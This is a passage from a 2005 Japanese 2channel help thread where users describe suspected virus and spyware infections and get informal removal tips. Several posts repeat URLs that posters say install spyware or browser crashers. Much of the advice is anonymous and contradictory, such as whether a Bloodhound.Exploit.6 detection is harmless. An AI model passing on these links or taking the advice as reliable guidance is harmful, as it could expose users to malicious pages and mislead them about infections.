それから直リン貼るな
8171:2005/03/24(木) 21:41:22
ほんとですか・・・
ありがとうございます
スレ汚してしまい申し訳ありません
たちの悪いジョークソフトですね
結構神経質なんでこういうの弱いんです
ありがとうございました
82名無しさん@お腹いっぱい。:2005/03/24(木) 21:42:53
>>79
直リン&スレ違い&マルチな>>71にはレス不要
8371:2005/03/24(木) 21:44:03
ホントすいませんでした
84名無しさん@お腹いっぱい。:2005/03/24(木) 23:41:16
exe拾って疑いも無く実効しておいて神経質とはコレ如何に
85名無しさん@お腹いっぱい。:2005/03/25(金) 01:20:02
健康のために毎日の運動を欠かさないその一方で
風呂上がりのビールが大好き(心臓への負担大)みたいなもんか
86助けて!!:2005/03/25(金) 22:15:34
アダルトサイト回ってたら感染してしまいました。
デスクトップが全部消え壁紙も変わりました。真っ赤な背景に DANGER SPAYWARE と出ます。

124498.exeというのがどうやら悪さしているのですが、windowsフォルダにいるやつを消しても復活してきます。

googleで検索したら外国サイトにひっかかりましたが、何語かも分からず苦戦しています。
http://www.google.co.jp/search?hl=ja&q=124498.exe&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

どなたか助けてください!!
87名無しさん@お腹いっぱい。:2005/03/25(金) 22:30:05
>>86
まず、

エロサイト見たら…助けて下さい!Part52
http://pc8.2ch.net/test/read.cgi/pcqa/1111405528/

こっち行け
88名無しさん@お腹いっぱい。:2005/03/26(土) 00:43:08
【動機は】雑音犬畜生Part28【何?】
http://tmp4.2ch.net/test/read.cgi/tubo/1107679450/
89名無しさん@お腹いっぱい。:2005/03/26(土) 15:05:51
再インストールに際しての質問なんですけど
ネットワークを介して感染するウィルスって
Sasser(とその亜種)MS_ブラスター(とその亜種)以外に
何かありましたっけか??
90名無しさん@お腹いっぱい。:2005/03/27(日) 13:06:06
Mydoom
Netsky
91名無しさん@お腹いっぱい。:2005/03/27(日) 14:05:40
ほかにもたくさんありすぎ
XPならファイアウォールをオンにしてアップデートすべし!
92名無しさん@お腹いっぱい。:2005/03/27(日) 14:21:46
先ほどからスクリーンショットが自動的に5分に1回のペースで撮られています。
ウィルスバスターオンラインスキャンで全てのファイルを検索しましたが、検出されませんでした。
アイコン絵がフォルダに偽装されたexeファイルも開いていません。
これはウィルスじゃないと見てもOKでしょうか。
OSはWindowsXP SP1です。
93名無しさん@お腹いっぱい。:2005/03/27(日) 14:47:06
>>92
スクリーンショットが撮られてるとなぜ分かる?
94名無しさん@お腹いっぱい。:2005/03/27(日) 16:14:21
>93
通常画面ではわからないものの、スクリーンショットを取った場合
その画面を保存するゲームで定期的に保存されているためです。
95名無しさん@お腹いっぱい。:2005/03/27(日) 19:05:06
ウィルスつくってばらまいている人が逮捕された話ってほとんど聞きませんよね?
ウィルスばらまきはやったもん勝ち?
なんで捕まえられないの?
96名無しさん@お腹いっぱい。:2005/03/27(日) 19:36:52
>>95
アメリカではEXCELのマクロウィルスばらまいた子供が逮捕されて、
6000万円の賠償させられてますよ。親は破産だそうですから、
払ってないんでしょうけど。
他にも何人か居ますけど、どれもアメリカですね。
特に、アングラサイトやニュースグループでやりとりしてて、
あれはオレだとかいう自慢をしてしまって、そこを張ってる
警察に家捜しされてアボーンが多いですね。
日本だとちょっと難しい捜査方法でしょうけど。
97名無しさん@お腹いっぱい。:2005/03/28(月) 08:22:10
ウィルスかなんか知らないけど、プログラムが全部消えた…
後に残ったのはゴミ箱とフォルダのみ
マイコンピュータとかも消えた…

ウィルスに偽装表示されてるのか?

ログイン画面はチェス
nyやってて引っ張ってきちゃいますた

どうすれば直る?
98名無しさん@お腹いっぱい。:2005/03/28(月) 08:34:50
>>97
あー、オレもなった。Luzhin Defence virus?とかいうチェスプログラム?のはず。
オフィスのインストーラーに偽装してあって、ものの見事にやられた。
圧縮ファイルとかにも感染してるし、酷いことになってた。
99名無しさん@お腹いっぱい。:2005/03/28(月) 08:44:57
直りますたか?

漏れはnyのクラックに偽装されててハマッタ…

リカバリーディスクもないしどうすれば…
100名無しさん@お腹いっぱい。:2005/03/28(月) 09:13:56
>>99
復元オプションで戻したら、一応あがるようにはなったけど、
かなり動きはおかしかった。あきらめてバックアップから戻したヨ!
101名無しさん@お腹いっぱい。:2005/03/28(月) 09:28:30
>>100
復元オプション?
やり方分からないです…

実家のPCだからヤバイ

買ったトコで直してくれるかなぁ?
102名無しさん@お腹いっぱい。:2005/03/28(月) 10:06:41
ny関連はダウンロード板http://tmp4.2ch.net/download/でやってくれ
103名無しさん@お腹いっぱい。:2005/03/28(月) 12:51:34
age
104名無しさん@お腹いっぱい。:2005/03/28(月) 15:13:52
教えてください。
ノートンやバスターなどのアンチウィルスのスキャンも
spybotなどと同様、セーフモードでのスキャンの方がいいのでしょうか?
105名無しさん@お腹いっぱい。:2005/03/28(月) 15:32:15
  ( ^ω^) ・・・
  (⊃⊂)

 ⊂(^ω^)⊃ セフセフ!!! 
  ミ⊃⊂彡
106名無しさん@お腹いっぱい。:2005/03/28(月) 15:32:33
>>104
とくにセーフモードでやれと推奨されてないから気にしなくていい。
ただし、スキャン中に他の作業をすることは推奨されてない。
だから、PC使ってない夜中とかにスキャンさせればよろしいかと。
107名無しさん@お腹いっぱい。:2005/03/28(月) 16:32:00
いや、起動しているとスキャンから身を隠すウィルスがいるのも事実
出来ればたまにセーフモードでスキャンした方が好ましい
108名無しさん@お腹いっぱい。:2005/03/28(月) 17:51:39
104です。

セーフモードでのスキャンにこだわる程の必要性はないけど
ある程度のスパンで定期的にやっておいて損はなさそうですね。
dクスでした。
109名無しさん@お腹いっぱい。:2005/03/28(月) 18:20:14
Bloodhound.Exploit.6 というウイルスが検出されたのですがこれは何ですか?
あとこれを削除するにはどうすればいいですか?
110名無しさん@お腹いっぱい。:2005/03/28(月) 18:23:41
>>109
      _______                     __
    // ̄~`i ゝ                    `l |
    / /        ,______   ,_____    ________  | |  ____ TM
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>>
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~
      `、二===-'  ` ===' '  ` ===' '  // ̄ヽヽ |__ゝ ヽ二=''
                         ヽヽ___//   日本
  _____ _____  ______  _______
  |  ウェブ  | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ._________________
      | Bloodhound.Exploit.6           |・検索オプション
      └────────────────┘・表示設定
         | Google検索 | I'm Feeling Lucky |  ・言語ツール
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ○ウェブ全体から検索 ◎日本語のページを検索
111名無しさん@お腹いっぱい。:2005/03/28(月) 18:28:50
>>110
有難うございます(´・ω・`)
112109:2005/03/28(月) 21:11:27
109でございます。他スレで質問することにします。
どうも有り難うございました。
113名無しさん@お腹いっぱい。:2005/03/28(月) 21:22:03
他スレの状況みてると、>>110氏の回答は非常に適切だったな。
114名無しさん@お腹いっぱい。:2005/03/28(月) 21:28:16
>>113
禿げあがる程に同意
答えるやつも質問者が自分で覚えるような形でやってやらないと意味ないよな
115109:2005/03/28(月) 21:31:06
すいません。必死で勉強します。
116名無しさん@お腹いっぱい。:2005/03/29(火) 10:29:03
age
117名無しさん@お腹いっぱい。:2005/03/29(火) 15:40:50
【使用OS】win XP
【WindowsUpdateしてるか】あまりしていない
【AntiVirusは何を使っているか】Norton
【ちゃんとUpdateしてるか】あまりしていない
【スキャンした結果(ウイルス名・発見場所)】スキャンではひっかから
なかったが、侵入時に感染したという表示が出た。
また、antivirusのログを見たら「Download.Trojan」「Bloodhound.Exploit.6」
が症状の発生する直前に感染していたことが判明。
【別のオンラインスキャンしたならその結果は】 trendmicro→検出なし
【症状を具体的に、分かる限りすべて書く】
ブラウザ(IE 6.0)でサイトを閲覧していると、最初は普通に表示されるが
ある時を境にjpg,gifを全く表示しなくなる(ステータスバーに「残り○○項目」と
表示され続ける)。これは、ブラウザを一回閉じてまた開くと一時的に元に戻る。
【何をしたらそんなことになったのか】 2chでリンクを踏んだ時に
antivirusが反応した。その時全て「遮断」を選択した。
【これまでにとった措置】
1.internet securityを無効に→意味なし
2.システム復元→意味なし


よろしくお願いします。。。
118名無しさん@お腹いっぱい。:2005/03/29(火) 15:45:11
>>117
まったく問題ありません。イタズラに反応しただけです。
119名無しさん@お腹いっぱい。:2005/03/29(火) 15:45:26
>>117
ノートントラップじゃないの?
120117:2005/03/29(火) 15:49:15
>>118
>>119
返答ありがとうございます。
jpgなどを表示してくれないのでインターネットを使う際にかなりの
支障があります。ウイルスとの因果関係は分かりませんが、時期的に
完全にかぶるので質問させていただきました。

121名無しさん@お腹いっぱい。:2005/03/29(火) 15:51:49
>>120
それはウィルスではなくて、IEの不具合です。
122名無しさん@お腹いっぱい。:2005/03/29(火) 15:51:50
【WindowsUpdateしてるか】あまりしていない
【ちゃんとUpdateしてるか】あまりしていない

この時点で答えてやる必要はないのではないか?
じゃあ次からはちゃんとしておけよ、ってことぐらいしか言えないだろ。
123117:2005/03/29(火) 15:54:08
>>121
ウイルスとは関係ないんですか、、、ありがとうございます。

>>122
実際そういわれたら何の反論もできないですね。
次からはちゃんとしますが。
124名無しさん@お腹いっぱい。:2005/03/29(火) 16:00:21
http://foffo-gunkanmaki.hp.infoseek.co.jp/url--uploader.html
ここのasongfor.s13.xrea.com/x/up/files/なんたらを踏んでしまいました。
ホームページが固定されてしまったのでエロページの対処法というのを
見てみたのですがCW Shredderとやらは何度起動してremovedになっても
時間が立つとまた再生され、Windows SyncroAdというアプリも
見つかりませんし、HiJack Thisで大量に出るログもほとんど別物でさっぱりわかりません。
desktopにおいてあったファイルが消えて(HD容量は減っていないので削除ではない?)
desktop画面はDANGER:SPYWAREとかいうhtmlに固定されてしまいました。
今も色々試してますがさっぱりです。
125名無しさん@お腹いっぱい。:2005/03/29(火) 16:02:38
>>124
ewido使え
126名無しさん@お腹いっぱい。:2005/03/29(火) 16:38:30
直リン貼るバカにはスルーという名のおもてなし
127名無しさん@お腹いっぱい。:2005/03/29(火) 17:29:55
テンプレも読まず
自分のケツも拭えず
他人への気遣いもわからず

わたしはこんな人間になりたい

とは思わない
128名無しさん@お腹いっぱい。:2005/03/29(火) 17:32:23
(´・ω・`)
129名無しさん@お腹いっぱい。:2005/03/29(火) 20:22:37
ADSLからケーブルに変えたら30分毎ぐらいに
ネットワークウイルス攻撃警告が出るよん。(´・ω・`)
130名無しさん@お腹いっぱい。:2005/03/29(火) 20:26:02
>>129
ブロードキャストパケットの警告を無視しるように定義しる!
131129:2005/03/29(火) 20:45:54
>>130
うは〜ありがとう。(゚∀゚)!
132名無しさん@お腹いっぱい。:2005/03/29(火) 21:14:50
mszx23.exe
drct16.dll

これらはどうすれば削除できるのでしょうか?
133名無しさん@お腹いっぱい。:2005/03/29(火) 23:46:46
>>132
>>1
134名無しさん@お腹いっぱい。:2005/03/30(水) 00:41:06
要はコレなんですけど
ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=1279082

デスクトップのフォルダが新たに他のディレクトリに生成されてるのと
画面プロパティがいかれて一切変更できなくなってるのと
アイコン右クリックでメニューが出ないのが治ったら
とりあえずいいです。
135名無しさん@お腹いっぱい。:2005/03/30(水) 00:57:42
>>134
WindowsのCDを用意して、CD入れて再起動。
CDをファーストブートにして、インスコしなおせ
136名無しさん@お腹いっぱい。:2005/03/30(水) 01:14:43
>>134
1.システムの復元
2.IE組み込まれたアドオンを直接削除する
XP_SP2なら場所はここ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
3.リカバリー
137名無しさん@お腹いっぱい。:2005/03/30(水) 19:06:14
ZIPファイルとかMP3ファイルとかのサイズが115kbになってて、
再生とか解凍とかできない状態になるようなウィルスってありますか?
ひさしぶりにPCを起動したらすさまじい被害状況で驚いたんですが。
138名無しさん@お腹いっぱい。:2005/03/30(水) 19:31:26
>>137
アンチウィニー。オレもやられた。キンタマよりまし
139名無しさん@お腹いっぱい。:2005/03/30(水) 20:37:59
>>138
サンクス、
ハード的な問題じゃないようなので安心しました。
140名無しさん@お腹いっぱい。:2005/03/31(木) 08:50:29
ラブホ向けコンピューター最大手のアルメックスで、
ネットワークを通じたウィルス感染があって、ホテル側端末も感染
http://www.almex.jp/

ホテルによっては自動精算機も停止して訴訟問題に発展か???
141名無しさん@お腹いっぱい。:2005/03/31(木) 08:55:43
2004年版ノートンが更新切れたため、電器屋で、2005年版ノートンを購入して(特別優待版)
インストールしましたが、更新キーを購入すれと出るので、電器屋に聞いたところ解らないとの事でした
再度更新キーを取得しなきゃならないのですか?教えてください
142名無しさん@お腹いっぱい。:2005/03/31(木) 10:13:20
>>141
【ノートン】インターネットセキュリティ Ver.62【2005】
http://pc8.2ch.net/test/read.cgi/sec/1111603203/
143名無しさん@お腹いっぱい。:2005/03/31(木) 10:48:23
すいません質問なんですが
最近パソコンいじってるとたまに
モニタ(画面)に一瞬血しぶきみたいなものが表示されます。
これってウィルスでしょうか?
144名無しさん@お腹いっぱい。:2005/03/31(木) 11:14:14
>>143>これってウィルスでしょうか?
現象だけでウィルスかどうかは分からない。ウィルススキャンしろ。
145名無しさん@お腹いっぱい。:2005/03/31(木) 11:17:54
Google Error


We're sorry...
... but we can't process your request right now. A computer virus or spyware application is sending us automated requests, and it appears that your computer or network has been infected.

We'll restore your access as quickly as possible, so try again soon. In the meantime, you might want to run a virus checker or spyware remover to make sure that your computer is free of viruses and other spurious software.

We apologize for the inconvenience, and hope we'll see you again on Google.
To continue searching, please type the characters you see below:


グーグルで検索すると、こういう上のようなエラーになります。
ウィルスは、パンダオンラインスキャンでチェックしたけどありませんでした。
スパイのは、Adaware,スパイボットでチェックしました。

なんでもいいので、このエラーについて教えてください。
146143:2005/03/31(木) 11:39:51
ウィルススキャンなんてわかりません。
とはいうものの調べてみました。
恐らく症状からみて感染したのはエフバウンドぽいです。
モニタに赤いドットが表示される・・・しかも木曜日にらしい
今ウィルス検出してるけど感染ファイル数200/20000以上突破

147名無しさん@お腹いっぱい。:2005/03/31(木) 11:46:30
>>145
検索しなはれ、って言いたいところだが、検索できないんだよなw 他の検索エンジンでGoogle Errorで検索汁w
>ウイルスとかスパイウェアとか、物騒な言葉が並ぶが、要は連続クエリは止めなはれということらしい。
>で、GoomaniやunDonutによる短時間で数百回のクエリが問題だったのだろう。
>検索やりすぎに注意!
ttp://www.hyperposition.com/se3blog/google/serps/20050306195250.html
148名無しさん@お腹いっぱい。:2005/03/31(木) 11:47:08
>>146
(・∀・)カエレ!
149名無しさん@お腹いっぱい。:2005/03/31(木) 11:51:06
このスレ、テンプレにオンラインスキャンのリンクないんだな…
シマンテックセキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp

次のテンプレに入れといてくれ。
150145:2005/03/31(木) 12:30:54
>>147
参考になりました。丁寧にありがとうございました。
151名無しさん@お腹いっぱい。:2005/03/31(木) 17:07:34
パソコンのウイルス対策ソフトPanda Antivirus Platinum
Internet Security 2005をネット上で申し込みましたが、
ダウンロードできません。
http://www.pandasoftware.com/
パンダ社に2回メールしても返事無し。
一度も使ってないし、返事しないという誠意の無さに返金
するよう 再度メールしても依然返事はありません。
カード会社に上記のことを話し、調査請求しましたが、結果がわかるまで
1〜2ヶ月かかるとのこと。
使ってないものの料金を払うのは納得できません。
またHPにはドルと記載されていて、請求書にはユーロになって
いるのもおかしい気がします。
国内のことであればまだしも、アメリカの会社なので どうした
らいいのか困っています。
どなたか教えてください、宜しくお願い申しあげます。
152名無しさん@お腹いっぱい。:2005/03/31(木) 17:11:22
>>151
通じる英語で書かないからだと思うよ。あと少し辛抱が足りないかも。
153名無しさん@お腹いっぱい。:2005/03/31(木) 17:12:26
>>151
板違いだとおもうが、
国民生活センターや各都道府県の消費生活関係部署に相談したら?
http://www.kokusen.go.jp/ncac_index.html
154名無しさん@お腹いっぱい。:2005/03/31(木) 20:38:19
>>146
155名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 06:21:50
俺にウィルス送って倒すことができたら100万円あげるよ!
[email protected]
かかってこい
156名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 09:42:37
お前終わったな
157名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 18:46:35
トレンドマイクロのオンラインスキャンを試してみたのですが検索結果のウィルスの場所の表記が最後まで見えないので場所が解らないのですがどのようにしたら解るようになるのでしょうか?
158名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 18:58:41
>>157
正式版を買ってください。
159名無しさん@お腹いっぱい。:皇紀2665/04/01(金) 22:29:25
age
160名無しさん@お腹いっぱい。:皇紀2665/04/02(土) 00:12:00
質問です。

なにかのプロセスがAvastAntiVirusのメールチェッカーを経由し
リモートのSMTP及びPOP3と通信しようして
Outpostに遮断されているのをログで見つけました。

Avastのログを見たのですが、時刻とリモートホストが残っているだけで
どんなプロセスがメールチェッカーを使用したのかは記録されていません。
Avastは常駐監視、加えてNortonでPCの完全スキャンを行いましたが
何も検出しませんでした。

PC上のプロセスを監視して、全てログに書き出すような方法はあるでしょうか?
できればそれをファイアウォールのログと照らし合わせてみたいと思っています。

OSはw2k、IE6です。
161名無しさん@お腹いっぱい。:皇紀2665/04/02(土) 01:39:16
>>157
場所って書かれてるとこの右の黒線にカーソル合わせて右にビーーッってしてみな
162名無しさん@お腹いっぱい。:2005/04/02(土) 18:45:12
とあるサイトでDLしたゲームの修正パッチ(exeファイル)をクリックしたところ、
「ウイルスの侵入が完了しました」のダイアログが出てパソコンの解像度と色数、
リフレッシュレートが変更されてしまいました!
すぐに元に戻してウイルスバスター2005でフルスキャンしましたがウイルスの感染は無いようでした。
クリックしたプログラム自体もウイルスとは違うようです。
そのプログラムは「W3.0.exe」という名前で144KB、鉄球のようなアイコンをしています。・・・
その他の被害は今のところありませんが、これは一種のジョークプログラムなのでしょうか?
大変不安です。不用意にexeファイルを実行した罰ですね。

【使用OS】                          xp-sp2
【WindowsUpdateしてるか】                1日に1度、手動でしています。
【AntiVirusは何を使っているか】            ウイルスバスター2005
【ちゃんとUpdateしてるか】                1日2回、手動でしています。
163名無しさん@お腹いっぱい。:2005/04/02(土) 18:50:04
>>162
そのとあるサイトを教えてください。httpは抜いてお願いします。
164名無しさん@お腹いっぱい。:2005/04/03(日) 02:36:31
JS_PHL.Aウイルスってどんなウイルスですか?
165名無しさん@お腹いっぱい。:2005/04/03(日) 02:50:02
>>164
>>1,>>7,>>10
166名無しさん@お腹いっぱい。:2005/04/03(日) 04:57:16
PC初心者です。宜しくお願いします。

【使用OS】WIN98SE
【WindowsUpdateしてるか】してます。
【AntiVirusは何を使っているか】 AntiVirusがわかりません。
【ちゃんとUpdateしてるか】    AntiVirusがわからない為、していません。  
【スキャンした結果(ウイルス名・発見場所)】 VBS.LoveLetter.A ・ ハードディスク内

シマンテックのウィルスチェックにて「VBS.LoveLetter.A」に感染の表示がでましたが、
PANDAのアクティブスキャンを行った結果、ウィルスは無しでした。
VBS.LoveLetter.Aに感染しているのでしょうか?
感染しているときの対処方法もお願いします。
167名無しさん@お腹いっぱい。:2005/04/03(日) 05:32:51
ネタ乙
168名無しさん@お腹いっぱい。:2005/04/03(日) 05:45:06
>>167

>>166の事ですか?
ネタではないんですけど・・・
169名無しさん@お腹いっぱい。:2005/04/03(日) 05:46:09
>>168
心配要りません。どうしても心配なら、ノートンかバスターを買って常駐させてください。
170168:2005/04/03(日) 05:48:01
連投ですみません。
>>166>>168です。
普段はID表示される板にいますので、気づきませんでした。
171168:2005/04/03(日) 05:51:53
>>169
ありがとうございます。
172名無しさん@お腹いっぱい。:2005/04/03(日) 08:38:49
近頃、何の前触れも無くフロッピーがアクセスされます。
もしかすると、フロッピーのデーターを持って行くようなウィルスやスパイウェアなんて無いでしょうか?

フロッピーにアクセス
     ↓
  暗号・圧縮化
     ↓
  どこかへ転送

重要なメモ(何かのID・PW)とかフロッピーにコピーしている人って多いと思うのですが・・・
173名無しさん@お腹いっぱい。:2005/04/03(日) 08:40:07
(´・ω・`)知らんがな
174名無しさん@お腹いっぱい。:2005/04/03(日) 08:57:12
つうか、自分で操作するときでも
FDDにアクセスするのに前触れあったらそっちの方が怖いな。
175名無しさん@お腹いっぱい。:2005/04/03(日) 13:58:43
>>168
>>7のQ1及びA1を参照
176名無しさん@お腹いっぱい。:2005/04/03(日) 15:21:09
>>172
Dtemp入れてない?
177名無しさん@お腹いっぱい。:2005/04/03(日) 23:00:23
Jane2Chを見てたら、ノートンがBloodhound.Exploit.6 のウイルスを検出しました。
修復できません とでたのですが・・・・。
これって ウイルスに感染しているのでしょうか?
初心者でよく分からないので、よろしくお願いします。
178プロフェッショナル ◆XPWYkecdOw :2005/04/03(日) 23:04:58
>>177
ウィルスではないよ。ノートントラップ。
なんてデマを書き込んで初心者を騙す人がいますが、
これはウイルスに感染してます。
すぐに、インターネット接続のケーブルを抜いて、
全ファイルスキャンをしてください。そういしないと
勝手にメールを送ったり、状況が悪化します。
179177:2005/04/03(日) 23:11:05
ありがとうございます。
参考にします。
180名無しさん@お腹いっぱい。:2005/04/03(日) 23:38:38
>>177
マルチは氏ね
181名無しさん@お腹いっぱい。:2005/04/04(月) 00:06:03
>>177
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.nibu.d.html
182名無しさん@お腹いっぱい。:2005/04/04(月) 00:48:59
>>177
http://pc8.2ch.net/test/read.cgi/pcqa/1112313860/

このスレのと同じなら問題なし。
183名無しさん@お腹いっぱい。:2005/04/04(月) 01:29:41
おきに入りに2ちゃんねるを登録しています。
1週間前位、お気に入りから2ちゃんねるを開こうとしたら、いつも見慣れている2ちゃんねるの画面じゃなく、うよく関係の変なページに行ったんだが・・
今は、もう直ったからいいけど・・俺だけか?それともみんななっていたの?
184名無しさん@お腹いっぱい。:2005/04/04(月) 01:38:55
真っ黒なページ?
185名無しさん@お腹いっぱい。:2005/04/04(月) 01:52:26
>>183
1週間前かい?4/1に4月馬鹿でそういう表示にはなったけどね。
そのページの上のリンクから入れたんだけど。
186名無しさん@お腹いっぱい。:2005/04/04(月) 01:52:31
なんか、日本の国旗の写真や共産や天皇とかとにかく恐かったのだよ・・
ウィルスですか?
セキュリティーソフトは、入れていません。
187名無しさん@お腹いっぱい。:2005/04/04(月) 01:56:33
>>185
そうなの?セキュリティーソフト無しでやっていたから、おかしくなったかとおもいました。
ありがとう。
188 :2005/04/04(月) 02:10:00
音楽が流れるようなサイトを開いているわけでもないのに、
ズンチャカ♪ズンチャカ♪と音楽が突然流れてきて、最後にガシャーンって
いって止まると言う事が何回かあったのですが、これってウイルスの類ですか?
189名無しさん@お腹いっぱい。:2005/04/04(月) 02:43:19
system32の中にmsencodedrv.exeってのが入ってるのですが
Kerioにそのファイルの接続の許可を求められました。
それ自体は遮断したのですがmsencodedrv.exeがやたらとCPUを食います。
ググッてもファイル名が出なかったのでウィルスかどうか分からないのですがお答えお願いします。
仕様OSはXPでSP2入れてません。
190名無しさん@お腹いっぱい。:2005/04/04(月) 03:32:37
>>189
名前からしてMS製っぽいファイルだけど、接続先はどこだったの?
191名無しさん@お腹いっぱい。:2005/04/04(月) 03:38:31
ググっても出てこないのはウィルススパイウェアが作ったランダムなファイル名だ思っていい
192名無しさん@お腹いっぱい。:2005/04/04(月) 08:09:41
>>189
ほんとだ。
でもね、サイトには自分のEXEの一覧を全部ぶちまけてる人が
たくさん居るし、MSもぶちまけてるんですよ。

それでググって一件も見つからないって、あり得ない。
そもそもMSのモジュール群でも、sysytem32につっこんであるような
プログラムは8文字になるように収めてるんですよ。
これは、DOSライクな操作の際の利便なんかを考えてのことなんです。
だから、msencode で検索してごらんなさい。たくさん出てくるから。

ということで、msencode+drv.exeという既存プログラムとウィルスの
ネーミング規則を合体させたモジュールだと思う。
193名無しさん@お腹いっぱい。:2005/04/04(月) 08:44:25
>>189
俺にはmsencode.dllしかない
194189:2005/04/04(月) 08:51:36
>>190-193
お答えありがとうございます。
接続先はIPアドレス検索したらJPホスト以外の情報ありませんでした。
IPアドレス自体は遮断して検索してて重くなって再起動かけたもんでうやむやに・・・
ログイン後、勝手に自動起動してCPU食ってました。
msconfigのスタートアップ項目に載ってないし、レジストリのほうも見つからなかったのに・・・
とりあえず実ファイルを削除して様子見ておきます。
195名無しさん@お腹いっぱい。:2005/04/04(月) 08:54:33
>>194
どこか、ノートンでもバスターでも入れてるんなら、
それを検体として、状況を書いて提出しなよ。解析してくれるよ。
196名無しさん@お腹いっぱい。:2005/04/04(月) 09:24:01
漠然とした質問で申し訳ないんだけど、
友人が「画面が真赤になって動かない」と電話をしてきました。
話によると再起動をしても変わらないそうです。
ウィルスバスターも何も入っていなかったのかもしれません。

現在機種などの確認をとっているところなので、何か情報が増えたら書き込みます。
197名無しさん@お腹いっぱい。:2005/04/04(月) 10:37:59
解決しますた
198名無しさん@お腹いっぱい。:2005/04/04(月) 11:17:00
age
199名無しさん@お腹いっぱい。:2005/04/04(月) 13:56:19
携帯からですが、よろしくお願いします。

リンクを踏んだらノートンが反応し、たくさん窓が開き出しました。
怖くなり電源を切ってしまったので、
どこを開き出したのか、はっきりと確認しておりませんが、
窓の名前?にTelenet(以下不明)という文字を見ました。
すぐにノートンでウィルススキャンをしましたが、何も検出されず、
何のウィルスに反応したのか心配になり、調べてみましたところ、
Trojan.Horse
なんとかLoveletter
(二つともスペルに自信ありません)
というウィルスだったようです。
スキャンして何も検出されなかったということは、
感染していないと思っていいのでしょうか?
(ちなみに更新はマメにしておりました)

窓がバーっと開いたのがとても気がかりなので、その後パソコンは開いておりません。

どうかご助言をお願い致します。
200名無しさん@お腹いっぱい。:2005/04/04(月) 14:07:01
>>199
どこを開いたのか分からない限り、正確なアドバイスはできません。
201名無しさん@お腹いっぱい。:2005/04/04(月) 14:13:06
199です。
何を踏んだかが重要だったのですね。
説明不足で申し訳ございませんでした。
調べてきます!
202名無しさん@お腹いっぱい。:2005/04/04(月) 14:24:49
>>201
絶対に貼る時にhttpを抜いてくださいよ。あなたみたいな悲劇が起こりますから。
203名無しさん@お腹いっぱい。:2005/04/04(月) 14:25:36
すいませんが、わかる方教えてください。
踏んでしまったのですが、特に今の所何も異常ありません。

> 222 名前:番組の途中ですが名無しです [sage] 2005/04/04(月) 12:53:22 ID:4N5O+vD10
> 大人気漫画のキャラクターの猫のぬいぐるみが発売
> ht●●●tp://www.yomiuri.co.nr/sports/news/20050401ie01.htm
>
> ↑これってあずまんがのねねここねねこ?
> 225 名前:番組の途中ですが名無しです [] 2005/04/04(月) 12:54:23 ID:wDzeOD7t0
> >222
> (・∀・)ゥィルスー!! & ブラクラ
204名無しさん@お腹いっぱい。:2005/04/04(月) 14:36:24
>>203
どうも記事とスパイウェアが仕込んであるみたいですね。ソースを見るぶんには。
しかし、こんなyomiuri.co.urなんて申請できるんですね。緩い国だ。
205名無しさん@お腹いっぱい。:2005/04/04(月) 14:38:01
すいません。よろしくお願いします。

【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 無料版Zoneのみ
【ちゃんとUpdateしてるか】 していない。
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 今の所無し。
【何をしたらそんなことになったのか】 urlを踏んだ。
【これまでにとった措置】 取り合えず、マイドキュメントは空。msminは起動していない。
【その他の質問】 簡易メーラーで自分あてにメール。何事も無し。
ぐぐっても情報は無し。url先は北欧の外国語・・・。
206名無しさん@お腹いっぱい。:2005/04/04(月) 14:41:38
>>205
踏んだURLをhttpを抜いた形で出してください。
207203=205:2005/04/04(月) 14:42:45
スパイウェア・・・ですか?
行き先や趣向の調査とかですか?無頓着でした。
駆除する方法があると聞いてますが、駆除すればお終いなんですかね。
208名無しさん@お腹いっぱい。:2005/04/04(月) 14:52:00
【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 していない。
【スキャンした結果(ウイルス名・発見場所)】 TrojanHorse
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 今の所無し。
【何をしたらそんなことになったのか】 urlを踏んだ。
【これまでにとった措置】 ノートンでスキャン。とりあえず脅威は発見されなかった。
しかしノートンの活動ログみてみるとそのウィルスの項目に「修復できませんでした」「アクセスが拒否されました」と書いてある。
209名無しさん@お腹いっぱい。:2005/04/04(月) 14:53:15
>>208
どこを踏んだのか、httpを抜いた形で貼ってください。
210208:2005/04/04(月) 14:55:13
>>209
www.albinoblacksheep.com/flash/open.html

211209:2005/04/04(月) 15:09:49
>>210
ひぃぃ。考えが甘かった・・・
僕程度の実力でどうこうできるものではありませんでした・・・
他の人にパス
212名無しさん@お腹いっぱい。:2005/04/04(月) 15:15:47
>>211
おまえブラクラのサイト運営してブラクラサイトを探し回ってる野郎だろ
213名無しさん@お腹いっぱい。:2005/04/04(月) 15:30:53
>>212
関係ねー厨房はすっこんでろよw
214名無しさん@お腹いっぱい。:2005/04/04(月) 15:40:42
>>213
なにもできないお前も関係ねーだろw
厨以下w
215209:2005/04/04(月) 15:47:01
まぁまぁ、ケンカしないでください。ちなみに私はブラクラサイトを運営してません。
ソース表示しようと思ったら、思わず踏んじゃいました(w
予備機でアクセスしてます。
本体はレジストリチェックをしたところ、意味不明の増加があったので削除しましたが、
念のため、ghostでリカバ(w
>>208さん、本当なら同じ状況になったのだから、ここから復活させて
方法を教えるのがいいんでしょうが、ブラクラじゃなくて、ウィルスがらみでは
ちょっと、メールで送られたりしたらとんでもないので。
